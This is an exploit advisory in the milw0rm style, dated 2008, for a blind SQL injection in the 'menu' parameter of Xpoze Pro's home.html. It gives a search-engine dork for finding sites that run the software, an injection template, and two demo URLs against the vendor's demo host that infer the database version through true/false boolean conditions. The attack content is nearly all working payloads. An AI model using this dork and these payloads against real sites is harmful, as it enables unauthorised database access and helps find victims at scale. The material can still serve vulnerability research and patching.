33 lines
No EOL
743 B
Text
33 lines
No EOL
743 B
Text
[■] Xpoze Pro (home menù) <= Blind $ql Injection
|
|
|
|
|
|
>---------------------------------------<
|
|
|
|
> AuToR: XaDoS (SecurityCode Team)
|
|
> Contact M&: xados [at] hotmail [dot] it
|
|
> B§g: Blind $ql inJection
|
|
> SIte vuln: http://www.xpoze.org/
|
|
|
|
>---------------------------------------<
|
|
|
|
|
|
[â– ] ExPL0iT:
|
|
|
|
Dork: " Powered by Xpoze "
|
|
|
|
|: http://www.example.com/home.html?menu=[$qL]
|
|
|
|
|
|
[■] D£M0:
|
|
|
|
|: http://demo.xpoze.org/home.html?menu=110%20and%20substring(@@version,1,1)=5 [NO°°]
|
|
|
|
|: http://demo.xpoze.org/home.html?menu=110%20and%20substring(@@version,1,1)=4 [y&$ ;-)]
|
|
|
|
|
|
|
|
[â– ] Th4nKs::
|
|
|
|
\> Str0ke </ \>Il pavimento</ \>sibilla</ \>Lo z00</ \>I FoxHound ( goto www.myspace.com/foxhoundindie )
|
|
|
|
# milw0rm.com [2008-12-12] |